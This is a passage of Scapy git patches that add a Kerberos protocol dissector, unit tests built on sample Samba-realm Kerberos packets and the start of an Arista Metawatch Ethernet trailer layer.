ASN1F_INTEGER("pvno", 5, explicit_tag=0xa0), + ASN1F_enum_INTEGER("msgType", 11, KRB_MSG_TYPES, + explicit_tag=0xa1), + ASN1F_optional( + ASN1F_SEQUENCE_OF("padata", [], PADATA, + explicit_tag=0xa2), + ), + Realm("crealm", "", explicit_tag=0xa3), + ASN1F_PACKET("cname", None, PrincipalName, + explicit_tag=0xa4), + ASN1F_PACKET("ticket", None, KRB_Ticket, + explicit_tag=0xa5), + ASN1F_PACKET("encPart", None, EncryptedData, + explicit_tag=0xa6), +) + + +class KRB_AS_REP(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_KRB_APPLICATION( + KRB_KDC_REP, + implicit_tag=11, + ) + + +class KRB_TGS_REP(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_KRB_APPLICATION( + KRB_KDC_REP, + implicit_tag=13, + ) + + +# sect 5.9.1 + +class KRB_ERROR(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_KRB_APPLICATION( + ASN1F_SEQUENCE( + ASN1F_INTEGER("pvno", 5, explicit_tag=0xa0), + ASN1F_enum_INTEGER("msgType", 30, KRB_MSG_TYPES, + explicit_tag=0xa1), + ASN1F_optional( + KerberosTime("ctime", 0, explicit_tag=0xa2), + ), + ASN1F_optional( + Microseconds("cusec", 0, explicit_tag=0xa3), + ), + KerberosTime("stime", 0, explicit_tag=0xa4), + Microseconds("susec", 0, explicit_tag=0xa5), + ASN1F_INTEGER("errorCode", 0, explicit_tag=0xa6), + ASN1F_optional( + Realm("crealm", "", explicit_tag=0xa7) + ), + ASN1F_optional( + ASN1F_PACKET("cname", None, PrincipalName, + explicit_tag=0xa8), + ), + Realm("realm", "", explicit_tag=0xa9), + ASN1F_PACKET("sname", None, PrincipalName, + explicit_tag=0xaa), + ASN1F_optional( + KerberosString("eText", "", explicit_tag=0xab) + ), + ASN1F_optional( + ASN1F_STRING("eData", "", explicit_tag=0xac) + ), + ), + implicit_tag=30, + ) + +# Entry class + +# sect 5.10 + + +class Kerberos(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_CHOICE( + "root", + None, + KRB_Ticket, # [APPLICATION 1] + KRB_AS_REQ, # [APPLICATION 10] + KRB_AS_REP, # [APPLICATION 11] + KRB_TGS_REQ, # [APPLICATION 12] + KRB_TGS_REP, # [APPLICATION 13] + KRB_ERROR, # [APPLICATION 30] + ) + + +bind_bottom_up(UDP, Kerberos, sport=88) +bind_bottom_up(UDP, Kerberos, dport=88) +bind_layers(UDP, Kerberos, sport=88, dport=88) diff --git a/test/regression.uts b/test/regression.uts index 47ed232aac7..e23f311db94 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1360,11 +1360,9 @@ random.seed(0x2807) o = bytes(a) o assert o in [ - b'\x02\x02\xfe\x92', - b'A\x02\x07q', - b'\x15\x10E55WW2a7yrh9XEck', - b'C\x02\xfe\x92', - b'\x1e\x023V' + b'\x1e\x023V', # PyPy 2.7 + b'A\x02\x07q', # Python 2.7 + b'B\x02\xfe\x92', # python 3.7-3.9 ] = ASN1 - ASN1_BIT_STRING diff --git a/test/scapy/layers/kerberos.uts b/test/scapy/layers/kerberos.uts new file mode 100644 index 00000000000..2c8a6dab6f3 --- /dev/null +++ b/test/scapy/layers/kerberos.uts @@ -0,0 +1,65 @@ +% Kerberos unit tests + ++ Kerberos dissection tests + +# https://www.cloudshark.org/captures/fa35bc16bbb0?filter=kerberos + += AS-REQ + +pkt = IP(b'E\x00\x00\xd9\xff\xff@\x00\xff\x11\x00\x00\x7f\x00\x00\x15\x00\x00\x00\x00;o\x00X\x00\xc5\x00\x00j\x81\xba0\x81\xb7\xa1\x03\x02\x01\x05\xa2\x03\x02\x01\n\xa3\x0e0\x0c0\n\xa1\x04\x02\x02\x00\x95\xa2\x02\x04\x00\xa4\x81\x9a0\x81\x97\xa0\x07\x03\x05\x00\x00\x01\x00\x10\xa1\x150\x13\xa0\x03\x02\x01\x01\xa1\x0c0\n\x1b\x08LOCALDC$\xa2\x13\x1b\x11SAMBA.EXAMPLE.COM\xa3&0$\xa0\x03\x02\x01\x02\xa1\x1d0\x1b\x1b\x06krbtgt\x1b\x11SAMBA.EXAMPLE.COM\xa5\x11\x18\x0f20150130151703Z\xa7\x06\x02\x04\x14\xe1\x18\xa7\xa8\x1d0\x1b\x02\x01\x12\x02\x01\x11\x02\x01\x10\x02\x01\x17\x02\x01\x19\x02\x01\x1a\x02\x01\x01\x02\x01\x03\x02\x01\x02') + +assert isinstance(pkt.root, KRB_AS_REQ) +assert pkt.root.reqBody.cname.nameString[0] == b'LOCALDC$' +assert pkt.root.reqBody.realm == b'SAMBA.EXAMPLE.COM' +assert pkt.root.reqBody.sname.nameString[0] == b"krbtgt" +assert pkt.root.reqBody.nonce == 0x14e118a7 +assert pkt.root.reqBody.etype == [0x12, 0x11, 0x10, 0x17, 0x19, 0x1a, 0x1, 0x3, 0x2] + += KRB-ERROR + +pkt = IP(b'E\x00\x02c\xff\xff@\x00\xff\x11\x00\x00\x7f\x00\x00\x15\x7f\x00\x00\x15\x00X;o\x02O\x00\x00~\x82\x02C0\x82\x02?\xa0\x03\x02\x01\x05\xa1\x03\x02\x01\x1e\xa2\x11\x18\x0f19810206083031Z\xa4\x11\x18\x0f20150129151703Z\xa5\x05\x02\x03\t\xae\xc0\xa6\x03\x02\x01\x19\xa7\x13\x1b\x11SAMBA.EXAMPLE.COM\xa8\x150\x13\xa0\x03\x02\x01\x01\xa1\x0c0\n\x1b\x08LOCALDC$\xa9\x13\x1b\x11SAMBA.EXAMPLE.COM\xaa&0$\xa0\x03\x02\x01\x02\xa1\x1d0\x1b\x1b\x06krbtgt\x1b\x11SAMBA.EXAMPLE.COM\xab\x10\x1b\x0eNEEDED_PREAUTH\xac\x82\x01\x84\x04\x82\x01\x800\x82\x01|0\n\xa1\x04\x02\x02\x00\x88\xa2\x02\x04\x000\x82\x01R\xa1\x03\x02\x01\x13\xa2\x82\x01I\x04\x82\x01E0\x82\x01A07\xa0\x03\x02\x01\x12\xa10\x1b.SAMBA.EXAMPLE.COMhostlocaldc.samba.example.com07\xa0\x03\x02\x01\x11\xa10\x1b.SAMBA.EXAMPLE.COMhostlocaldc.samba.example.com07\xa0\x03\x02\x01\x03\xa10\x1b.SAMBA.EXAMPLE.COMhostlocaldc.samba.example.com07\xa0\x03\x02\x01\x01\xa10\x1b.SAMBA.EXAMPLE.COMhostlocaldc.samba.example.com07\xa0\x03\x02\x01\x01\xa10\x1b.SAMBA.EXAMPLE.COMhostlocaldc.samba.example.com0"\xa0\x03\x02\x01\x17\xa1\x1b\x1b\x19SAMBA.EXAMPLE.COMLOCALDC$0\t\xa1\x03\x02\x01\x02\xa2\x02\x04\x000\r\xa1\x04\x02\x02\x00\x85\xa2\x05\x04\x03MIT') + +assert isinstance(pkt.root, KRB_ERROR) +assert pkt.root.cname.nameString[0] == b"LOCALDC$" +assert pkt.root.realm == b"SAMBA.EXAMPLE.COM" +assert pkt.root.eText == b"NEEDED_PREAUTH" +assert len(pkt.root.eData.val) == 384 + += AS-REP + +pkt = IP(b'E\x00\x05\x95\xff\xff@\x00\xff\x11\x00\x00\x7f\x00\x00\x15\x7f\x00\x00\x15\x00X;p\x05\x81\x00\x00k\x82\x05u0\x82\x05q\xa0\x03\x02\x01\x05\xa1\x03\x02\x01\x0b\xa2H0F0D\xa1\x03\x02\x01\x13\xa2=\x04;0907\xa0\x03\x02\x01\x12\xa10\x1b.SAMBA.EXAMPLE.COMhostlocaldc.samba.example.com\xa3\x13\x1b\x11SAMBA.EXAMPLE.COM\xa4\x150\x13\xa0\x03\x02\x01\x00\xa1\x0c0\n\x1b\x08LOCALDC$\xa5\x82\x03\xafa\x82\x03\xab0\x82\x03\xa7\xa0\x03\x02\x01\x05\xa1\x13\x1b\x11SAMBA.EXAMPLE.COM\xa2&0$\xa0\x03\x02\x01\x02\xa1\x1d0\x1b\x1b\x06krbtgt\x1b\x11SAMBA.EXAMPLE.COM\xa3\x82\x03a0\x82\x03]\xa0\x03\x02\x01\x12\xa1\x03\x02\x01\x01\xa2\x82\x03O\x04\x82\x03K\t\x05\xd7\x91\xdc\x14\xaa\xe2\xfb\xcc\x85\x1f*?\xbau\xbc0\x0f\x80\x8bc\x87\xe5z\x1a4i\xa3\x9bL[-\xb1\xb7\xaa\xd9-\x01\xc2\xf2\xdfs\x17<\xf3&\x99\'1\xfa\x80\xd9\x02\xae\xf5\xb3S\x14\xc2L\xc3e\xc9\x94\x03dH\xe2\xa9\xfd\x9a\xc6\xffs\x10\xf3er\xbd\xa0\xfep[~\x82+\xde0\x91%tc\xdcx\xfe\xd0\xd8\xc4\xb6u\x91\xe7\xe1C\x00y\xb8\x15\xd9\x91j\x0f\xe7\xa0\xe24m\xd94\xe5.I\xc51\x8f\x1do\t\xe9\x98\xb8\xad\xa6\x92\xf3\x15f\xc98o\x92\x0ch\x08\\\x8f\xab\xfau\xaf\x19v\xcc\xcb!v\xb5v2\xeb(h\x1c+o\xea\xc3\x0b\xcf\x81\xc8\x89\xe8i\xdd?\xd1\xaa\x0f3\xc9\xe9\xf2\xd7\x8a\x93`\x02\x9d\xb2 LV\xda\x0f&>,~\xb3\xecK\xe76v\x9a\xc3\x88\xe3\rj\\/\xd6\x9e_X\x14z\xc2w\x1d.|\xbf\x18\x01\xc8`].\xd2\xc2\x1e\xd0\x89\x8f\xd2\x18\xb9U\xaf\x98\xe9V\xe2\x19\xa1\xbb\xc45\xd9\x16\x08c\xaf$\xef\xf2\xf4S\xeco\xa1\xa1\xe5)\x99\xc9b#[\xd1:O\xbej\xb91\xb3i\xbepb\x06\xd8\x14\xc3\xdf\xbb\x18\xbf]\xf1\x82+\x18*\x85D\xecy\x0eu_\xe2\xfa\xbcd\x82A>\x88p\xa2\xc1\xf6\x9c\x89Qj\xfdM\x99\xd1\x84r\x0fp\x06$\xab\xc2\xb5\xae4\xe8\xf1\xbb}\x98\xedWX\xe2*uB\x93\x11\x1c\xc7f\x1c\xce\xc9\xff\t\x88\x94\xddN\xcf\xa68O\x0c^I\x9ew\x81\xba\xc3\xbc\xa8\x07\x8b\xd4\xdf\x7f(\xc2\x15gX\xd0oN\x00u\x1aU@\xbd\xb8\xa9)Ur\x94\xc1\xcf\xa1\xd8k\xc1F\x19\xd3rR\xaa\x93\xe2\x06D#\x12\x07M\xe3\x15\xd6\xd0\xb3\xa6\x89\x0c\xfeLO6\xe6\xf0w\x1a\x80\x0f\xffO\xf2N\xf4(\n\xdb-\x96`\xa4\xb7\xd3g\x16\xbfY\xff\xad\x95\x19\xd9\x9cS\xaa\xe3\x06W\xf3\xc2\x18it5\xda\x1c\x99\x8a\xaf\xfa"MT\xc7$#j,P\x9b\xf9\r\xbbA\xd0w\x15.\xc3PC\xc4\xe7vL/\xca0h7\x1c4z\x8bS@\x0ej\xb4q\xde\x19\xd8so\x9c\xea\x8f^w7\x1e\x92\x1c\xcc\xe2\xa60\xe8\xce}\xee\xb1\x87F!n\x80\xe4l"\xed\xc2fI \xb9\t\x14\t\x8d\xect\xa4\xb48\xe0\xfd\xf3\xe5\x8es\xd2\x08;\x9f\xb2\xb8q\x1bX\xadd\xbb\x07z\x16\tZ\xb0z1+h\x0e\xf7\x98w\x0bX\xf0W\t\xa6\x86.\x1e\x9c\xc2\x9d\xac+\xca\xdf&\xa9\xf3\xcb\xa7\xca\x1fn\xe8\x8a]h\xf6\xeb\xe9\xd4\xa0\x16\x1b\xb4\x8d\xc7\xaf\xe3\xf0.\x85\x1e\xc2\xa5\xf2DhhgQ\xe0\xb8y\xb8\xbd\x98\xf8\xa0\rW\x93/\x07>0\xf5\x92Y\x15Y\x0bD\xdb\xd6\xac#\xd8z\xbdeY\x87\xf2\x97\xfdZ\x0c\x1d\xbc\xefXONv\xc9\xfdp\xdd^\x16\x83\xc3\xeb\x9e\x96+\xe8\xed\x0c<$\x83A\xeb\xc6e\x94\x0c\x11\x19\xb4\x99\xcd\x17\xeb\xcb.\x0b}\x01i\x88\x03R\xde\x1a\xea\x03\x10\xa9Z\x8e\xf7\x87\r\xa6\x08@\xf7\x96\xc8\xa5g\xde\x8dE\xf8\xb0\xe8\xe6T\x80=\x0cm\xe0z\xa5\x03\xa2X\xed\'\x17\x001O\xee\xfb\x87\xbe\xf7\xbbS\xc1p\xaeZ\x17\x92}\xc2\x07\x01\x81\xaew\xd9\xc5\x9c\xe5k\x8d+\x13\xd2\x00Q\xd4\xe5M\x9d\x06\xc7)\xac\x06\xb2+\xd1\x83\xcb\xfe\xb9\xf9\x0bbRN\x04\xe7\xd8\xa0\xf9\xe3\xc3m\x18\xc4\x108\xfa\xa6\x82\x01:0\x82\x016\xa0\x03\x02\x01\x12\xa2\x82\x01-\x04\x82\x01)/pDi\x13\xee\x0b\x8ehN2\x01P\x19|\xda\x1a\xde\xec\xde\rt\xcbe7\x00-sG&\x8b\xfc\xa4\x92~~[,\xd5\rAj\xd6[\xbe\xeeB\xf8X\\x\xa6$Z\x83\xf6\x1bq\xc5\x8fm\\\x94\xd7l\xc5\x89#\xcb\xcd\xaf\xff\x15\x1b\x8f;7\xb0\xc8u\x19\xb1\xd0\xb0\x93\xa7z\x9cz\x14\x0b\x86q\x01\xb8<\xa7\xa4\xceb\x1f\x88\x14\xe3S0\xe3]\xa5\x9b\xa0\x0e\x97#\x87\x9a\xe0\x90a\xdfj.\x1e6x\x87GV\xc0/\xa4\xab}\xdbS\xd5\xff\xc1\x9f\xeb\xae\xcb\x04\x071\xf1x\xff\xe5M\xfc\xbct\xea^e!\xce!|\x893/\xa1\n.\xb7T\xc5Ph\t\xf1\xbak\xcd\xdb\xff+c\xab\xcfY\x8a;*/\xd8\xa5\xd0\xd7c\xc6\x02B\xed\x82\xcf\xa0\xe5\xdf@rq\x8cRG\x1a\xdey_#\x18\t\x9d\xac\xa4\xfe\xd0\xeb{\xcb(E\xb8\xac\xc9\xe3\x06\xe0\x15}\xb89\xb1L>\x060\x93\x1dtl\x1f\xa0\\s\xdb\x85\x82\xdf\xb3L\x80\xe7/\xae\x0e\x11V\xdeH:J K\xb1g\x95\n\xc2\xd2\xc2\x83k\\6\x0eg\xd0{v\'\xa4\x1c\xe2\x10-\xeb\'\xc7?F\xd8J\xe8\x90Z4V\x12\\\x9e\xc2\x05\xfc|\xb3\x01\xe5\x1b\x14\n\xaa\xff\xb9\xff\x07\x03L\x10\x1d\xc8\xa8\xed\x00A\xf3\xf2\x16\xa3\xd8":!\x04m\x10Uo\x11\xa5d5\xc1\x1es\xde=\xa6\xdd\x9b\'\x03(L(*\x92C\xca\xc8\x92\x1b\x08\x06z/\xb4=\xd8Mz\x816\x9f-\xc0\xe8\xcf\xd2A\xfeyk)WH\x11\xdf\'\xf4\xefG\xfc\xef\xd0\xb5\xec\x91\x87\xf4}b\xb2\x1e>\x1f\x9d4~h\xa0=\xfd(i0|\x03\x98k\x05#Y\xe35\x1c\x7fn\xac\xf2\x896\xa6p\x13\xc1\x94&Q\x8f\x1c\x07\x8cN\xb0\xb6=\x83R46\x04\xfa\x86\xbc\xc1UO\x03\xd8\x0e\x0c\x9f\xbd/\x02f\x90\xa8\x9e\xd3 \xb4\\\n!\xf9"\xc3\n\xe7\xe2\x92\x05t\x11\xa1\x9e<$i+U\\d1\t^\'\xb7\x12\xfd\xe5\xd7\xc4\xd4\xb2\xa9!`\xd8\x97\x8b\x9a\x0c:\xcc\x85\x90)_\x11\xefR\x00\xe5k\x12I\xe2\xf6\xf4h\xa4.\x97\xf2\xea?\x1e\xf9\xcf\xe6\xac\xc7\xdd\xd0\x8f\x0bml\xcb[\x801\xce\xae\xd28\xc0\xe9\xb1\xb0\x19\xc9r\xd2\xd4=\xdaw\xff\xc7\xbd\xe7\xf8\xa9\x8d\xc6\xda\xa9y\x9b\x98\x19\x05\xb1]\xbc\xe2\xe3\xaf\x8c8\xcd\x12\xf8\x90\xea\xd0\xe3\xc3\xba|\xe28(\x8f\x99\xba\xden\xefJ\xc4r\x9e\x17\xe8&\xd6\xe4\x83 \x92\x19d?\xa6\xcc\xbd\xff\xa5\x83@\x17\x13\xefY\xd7\xa7\x1e\xe4\r\xd2\x846\xf8~!L\xe5\xdd\xb3\xb4(\x14\x1e\x1a\xfcP\x8ezE\x1ffFJ.\x82\x1f\xd3\xc5l\x9e\x0b3u4b\x0c\x94\xd6R\xc0\xe5\x96\x83\x95\xa1\x12\xa2\x18;\x96\x9di\xca\xc8\xd9\x15\x81\n\xa9\xc3\xe8\x1eS \x93j\xeb\xa4\x81\xc60\x81\xc3\xa0\x03\x02\x01\x12\xa2\x81\xbb\x04\x81\xb8-Y=\xd3\xfc\xeb \xd8\x16\xd9\xb2O\xfc1\xc9\xd5\'zN\xd2\xb6\xf4\xc6Q7\xaa"B\xe7\xac3\x19\x86\xad\xd5@\xa6\x1f\xd8a#EN\n\xba\xc3\xd95\xe5\x93\x07,j\x97V [o\xe3\x91!d\xe6|\xa4\x94\x14\x9dj1J\x82as[\x83\x80\x99\xa3\xec\xc1\xda_\xe7\nLej\\\x9eW\x11\'7\xfeq=)\xef-\xf5K\x15\x8e\xbf\xb8]m\xb6\xc2\xce\xb4xN,\xdb\xbeaB\x86\'\x068\x05\\\xafF\x08DFpJtX\x0c\xc1\xdfw\x9b\xb1\xf8x\x93\xac\xf9\x14X;h\xe3E\xc0\xe4i\x19\xe5:\xe7\xe5\x86\xa7{\x96\t|\x9aG\xc0\x169\x08\x03A\xa6\xc4j\'-\x07\xf4\x9c\x88"\xc00\x81\xe0\xa1\x04\x02\x02\x00\x88\xa2\x81\xd7\x04\x81\xd4\xa0\x81\xd10\x81\xce\xa1\x170\x15\xa0\x03\x02\x01\x10\xa1\x0e\x04\x0cW\xb7\xdc~\x96.\'\x92\x1a\xdfh\xb9\xa2\x81\xb20\x81\xaf\xa0\x03\x02\x01\x12\xa2\x81\xa7\x04\x81\xa4\x9b\xfc\xb3\x8c\xc5\x1e\xa1q\x19"\xf0\\\xa7\xa6`\xc9:\xd6KA\xd5\xac\xa9$\x8a\x18z\x81\xce\xc9\x0f\xe0\xd5\xad\x848t\xb7\xe3\xf1\xffC\'\x16Z\xc6\xe1of5\xf2R\xb31\xbf\xfa\xaf$\xe5\x1d\xa8\xd3sf\xbb$\xc5%\x17\x0c\x98\x98\x08\x85\xd18\x91o\x8d\x83\x86P\x9e\t\xd9V\xd1\xe4\xeb\xa8\x11\xd6\xaa\xb7\x88\xde\xbe2\xbf7\xb8\xca\x1c\x90\x10GB\x06\x046\xc8\xff\n\x02$_\xce\xcfk\xc9xd\xe5\xbf!4q\x83*/B[\x8fJ\xfa\xf4\xad97\xd8\x8f,3b\xb7\xe0\x94\xca\n\x12]\xc9\xfc\x7f\xbb{2p\xa0\x8f1e6$\xa4v0t\xa0\x07\x03\x05\x00@\x81\x00\x00\xa2\x13\x1b\x11SAMBA.EXAMPLE.COM\xa3,0*\xa0\x03\x02\x01\x01\xa1#0!\x1b\x04ldap\x1b\x19localdc.samba.example.com\xa5\x11\x18\x0f20150130011709Z\xa7\x06\x02\x04T\xcaN\xf5\xa8\x0b0\t\x02\x01\x12\x02\x01\x11\x02\x01\x17') + +assert isinstance(pkt.root, KRB_TGS_REQ) +assert pkt.root.padata[0].padataType == 0x1 +assert len(pkt.root.padata[0].padataValue.val) == 1204 +assert pkt.root.padata[1].padataType == 0x88 +assert len(pkt.root.padata[1].padataValue.val) == 212 +assert pkt.root.reqBody.kdcOptions.val == '01000000100000010000000000000000' +assert pkt.root.reqBody.sname.nameString == [b'ldap', b'localdc.samba.example.com'] +assert pkt.root.reqBody.till.val == '20150130011709Z' + += TGS-REP + +pkt = IP(b'E\x00\x06V\xff\xff@\x00\xff\x11\x00\x00\x7f\x00\x00\x15\x7f\x00\x00\x1d\x00X;\x97\x06B\x00\x00m\x82\x0660\x82\x062\xa0\x03\x02\x01\x05\xa1\x03\x02\x01\r\xa2\x81\xe90\x81\xe60\x81\xe3\xa1\x04\x02\x02\x00\x88\xa2\x81\xda\x04\x81\xd7\xa0\x81\xd40\x81\xd1\xa0\x81\xce0\x81\xcb\xa0\x03\x02\x01\x12\xa2\x81\xc3\x04\x81\xc0\x8cqa\xdf\xfe\x13<7\xc1:\x8d\x0bshxOC\xd6\xcb\xbdz\x1a\xf5\xaa\x9c8\xce\x9f\xed\x99\xeb\xd8A\xba\xdcj\xffF4|\xc7\xab\x84~\xb9\x8f\x04\x0e<\xf1p#\xf7kK\x86\x05+%\\:\xcb^\xc8e\xeb\x0f\x81\x92\xa0\xf3"\xcd\xbb\xf3\xb9\x91\xc8\x94\xa27\x8c\xae\xc44\xa8\xd27\xd1J`K\x93M\xe3\xefUy\xda\xc6\xb7\xe6\xc8\xed\xa79\xd4\xd5\x9a\x12f\t\x1c\xb5\xa7A\x95\xaf\xa1\xac\x1d\xde\xfb\x1c\x0ec<5\t\xabYU\xd4\xd4\r\xf4]\xec\x00t^K\xed\xca\x81\xad\xbe\x99\xdc\x10g\x9c$\xfb\x82s?\xf4\xb9\xa5\x8eW\x02\x7f\x87A\xf7\xc4;2q \xd2\xbc\x10\x13\xc9\xa0w[\r\x01Pt\x7f\x95^\\\x8e\xbe\xee+\xa3\x13\x1b\x11SAMBA.EXAMPLE.COM\xa4\x1a0\x18\xa0\x03\x02\x01\x01\xa1\x110\x0f\x1b\rAdministrator\xa5\x82\x03\xe5a\x82\x03\xe10\x82\x03\xdd\xa0\x03\x02\x01\x05\xa1\x13\x1b\x11SAMBA.EXAMPLE.COM\xa2,0*\xa0\x03\x02\x01\x01\xa1#0!\x1b\x04ldap\x1b\x19localdc.samba.example.com\xa3\x82\x03\x910\x82\x03\x8d\xa0\x03\x02\x01\x12\xa1\x03\x02\x01\x01\xa2\x82\x03\x7f\x04\x82\x03{\x97\x9c\xac\xf1\n\xe6;\xd8\xe28m\xba\xb7\xea#\x19\xd3Zf\x1c@\x00H\xf9"\xe7\xb4\xf3&3\x02X\xb5\xc0{e\xffm\xc8\xcf\xe2\xf9p\xb57~\xd8\x91?/5\x7f\xde\xc4/\xaa\x1c\x08pQ(\xff@\x8e\xb7\xf0\x91N\xbcK&0\xbdWo_W\xf8\xbe\xd6(\xd1`\xba\x8f.\x86\xc29\x88\xe5:,\x16ui\x98y\x100Q\xf6k1\xe6\xe5-e\xdc\x80\xc0@\x87i9Z\x7f\x07\xeb\xf2\x8f\xb1\xc4\x83*z\xbbq\xbfZs\xd7\xefFAZ\x84w\xa2-\xc8\xca\xa3\x84\xa2\x0bm\xce7 pIX\xa1\x05\x83\x01t\x06\xabI\xa3dp\xe3\xaa\xd0\xd6\xb0!\xfd\xbea\x9buL\x0f\x99\xbfg\x11|J?\xfdl\xcd\xb6\xae\n\xdc\x06kS\xc60\xad\xf3\xacq\x0f\xd5lbX\x8d^\xf9\x83\x80ax\x1c\x12\xaa\xe3\x07Y\x1ef\xae\xd6\xc9\xd4y\x94\xb5\x93\x83\x03m\x03U\xf3\x9a}L3Xi \xf94\xffFf}\x99\xfd\x04I\xe3\xcd\x9f\r\xb7>r\x0e\xcf\xeb$\xc8\xdcO\x95\x88\x04\x1c\xf0\xf9\t2\x92\xc4\xe3\x10\xfa\xb0\x14\xb5\xfb\xf0.\xcc\xa3\xdc\xab\x0f\xd76\x8e\xbf\xd8\x7f@U-x\xc8 \xd42\xf8\xfd\xce8\xdbl\x16\xc1\xaa\xb3\xe32\x87\xd3\xecIc-\xcf\xab7\x0b\xd9b\x9f9\x06\x88|q\xca[\xb8\n\xfb\xf7\x0bl]:\xbc\xe1\xab:K;w6\xcf\x1c\xa6\x1a\xec\xc0\xe2\xea\x89\xe6u\xe4(\xec\xec\xda!\x06\xfd\x9c\xeeZb4\xeb\xff\x06j\xbc\xfe\x90\xb6\x93\x0b:t\xf1|\xa3`\xfb\xc5\x9a\xa5\x11w\xb2}oP\xccj\x10M\xf3\x98\xbdCj\xa9\xcd\x93\x83\xf9N"\xbc!z8\xf6\xca\xe3\xbc\x04\x92\x14\x16i\xa40\xbf~\xb5\x12\xbeC\x83\x9e\xbdH\x13\xcasxFM\\\xd7\xc9\xd3B\xacM\xe7\x1c\x8ej\x12\x197\x06\xae\xbd\x1c\x84J}\xab\x8b\x05F\x8a\x13\xbe@]\r\xc2-\x9fA\x19\x94Jl\x12\xba\n\xad\x16T\x94\xb85U\xc1o\t\x04\xb2F\xa1\x17M4\xc3\xb2N\x17\x8f\xfe\x190\xc2\x11q\xc3A\xd9\xafn\xc8\xc909\xc4\x05\x03\xf3\xb2\x8e\x97\xfcL>E`\x11`\xce\xe5n\x15\x84\x84~\xdfZ\x98S\x0f[\xc3\xaa\x8e\xcf\x9cU\x93\x94\x04>\x05\x90\x1c\x00\x1a7\xb7\xe9\xc9\xc9\xb6Eq\x13\x1e\xb5\x86\xc3}&\xe7\x1b\xe5(\xce\xe3b\xd5\t\x11\x1f\x1e\xe3;O\xd9J\x85\xc5\xfa\x82\xd2\xc9\x88\xc5\xa8\t\xf5\xdb\x85vi\x1d\x97\x12j\xe8\xabL\xf0J\xd3\xbe\x1c\x7f\x1a\xb7$k\x87\x9e\xc3\x9aH\x1e\x96>\x19\x0fE\xff\xe2\xc8\xc2|W4\x12\xe4\xc7G[\xdc\x93\x17E%ur\xcem\x169\xf2I\xab\xbb\x8d\xca\x0fM0n\x19\x06\xeb<\x03\xa7fw^\xdd(V:\xc0\x14+\x08L\x17\xbe\xc9\xa6\x82\x01\x1e0\x82\x01\x1a\xa0\x03\x02\x01\x12\xa2\x82\x01\x11\x04\x82\x01\r\xeeN\xd0\x1b\xa0\xc4\xb0C\x12,\xdd\xbd\x96\xe8\xbai"j\xbc[O\xff}Z\n5%\x98\xfc{`Q\x92\xe4\x95\x1azM\x15b\x98Ah\x02\xb2V\xd5\x0f9\xb3\xd5\xcf!\xdf\x1e\x9c\xd4\xc08\xc0|\x10\xc8\xb0ol\xcd\xa6?\x19\xfa\xb9\x0b\x9d\x96\xaa_,O\xe2 @4;\x1f!\x12\x8e\xf3h\xbc\x95\xa2\xcfE\xaey\\U\xdcc\xbe\xecN\x9e\xaa\x9d\x83\x1a\x9ad\x11\x15X\xdf)L\xd8Z\xe3\xa2&\x1c\x1b\xf8\xd1\x8e\xfb~\xdd\x16^\xfa\xf9\x15\x96s\x03\xf8T\x86\x12B\xdf\xf7m@\xfa\xf5L\xdd\xb6\xa8\x9af\x90\x90\xcd\xa9\xdf\x97`\xd3\x1c)\xc5n\xe8\xc1\xe0\xb4\xc7"\x16\x91<}\n\x94\xec\x8d\xc6.d\xe1\xf5/i\x89$\x9a\xebW\x0c\xf7\xfe\xc5\x12\x10\xb8\xa5\x193\x88hR\xa0\xf7t\xa9\xc6\xc2\x15E\xbd\xd6\xf09\x1d\x12\x83o\xb35>o\xa0\x98\xda\xf2\xad-1\xd0\x94\x12Be\xe0\x04\xe0\xf7\xcf\xbbAZ\xf5\x1c\x88\xf5\xef\xb2\x9bi\xdc\xd0\x07\x8f\xca\r^\x92\x02\x15\x87\xef\xd5\x90\xb5') + +assert isinstance(pkt.root, KRB_TGS_REP) +assert pkt.root.cname[0].nameString[0] == b'Administrator' +assert isinstance(pkt.root.ticket, KRB_Ticket) +assert pkt.root.ticket.sname.nameString == [b'ldap', b'localdc.samba.example.com'] +assert len(pkt.root.ticket.encPart.cipher.val) == 891 +assert pkt.root.encPart.etype == 0x12 + From f1ea680511189448d53b82248df2867c42b4fc40 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 24 Jun 2022 13:07:59 +0200 Subject: [PATCH 0825/1632] Arista Metawatch rewritten -again- * Arista Metawatch * new unit tests * TrailerField merged with FCSField --- scapy/contrib/metawatch.py | 30 +++++++++++++++++++ scapy/fields.py | 59 +++++++++++++++++++++++++++++++++++--- test/contrib/metawatch.uts | 19 ++++++++++++ test/fields.uts | 26 +++++++++++++++++ 4 files changed, 130 insertions(+), 4 deletions(-) create mode 100644 scapy/contrib/metawatch.py create mode 100644 test/contrib/metawatch.uts diff --git a/scapy/contrib/metawatch.py b/scapy/contrib/metawatch.py new file mode 100644 index 00000000000..e09670742c0 --- /dev/null +++ b/scapy/contrib/metawatch.py @@ -0,0 +1,30 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# Copyright (C) 2019 Brandon Ewing +# 2019 Guillaume Valadon + +# scapy.contrib.description = Arista Metawatch +# scapy.contrib.status = loads + +from scapy.layers.l2 import Ether +from scapy.fields import ( + ByteField, + ShortField, + FlagsField, + SecondsIntField, + TrailerField, + UTCTimeField, +) + + +class MetawatchEther(Ether): + name = "Ethernet (with MetaWatch trailer)" + match_subclass = True + fields_desc = Ether.fields_desc + [ + TrailerField(ByteField("metamako_portid", None)), + TrailerField(ShortField("metamako_devid", None)), + TrailerField(FlagsField("metamako_flags", 0x0, 8, "VX______")), + TrailerField(SecondsIntField("metamako_nanos", 0, use_nano=True)), + TrailerField(UTCTimeField("metamako_seconds", 0)), + # TODO: Add TLV support + ] diff --git a/scapy/fields.py b/scapy/fields.py index 1f8d8ab98df..945cea6c736 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -78,6 +78,7 @@ class RawVal: b'F\x00####\x00\x01\x00\x005\xb5\x00\x00\x7f\x00\x00\x01\x7f\x00\x00\x01\x00\x00' """ + def __init__(self, val=b""): # type: (bytes) -> None self.val = bytes_encode(val) @@ -103,6 +104,7 @@ class ObservableDict(Dict[int, str]): """ Helper class to specify a protocol extendable for runtime modifications """ + def __init__(self, *args, **kw): # type: (*Dict[int, str], **Any) -> None self.observers = [] # type: List[_EnumField[Any]] @@ -306,6 +308,7 @@ class 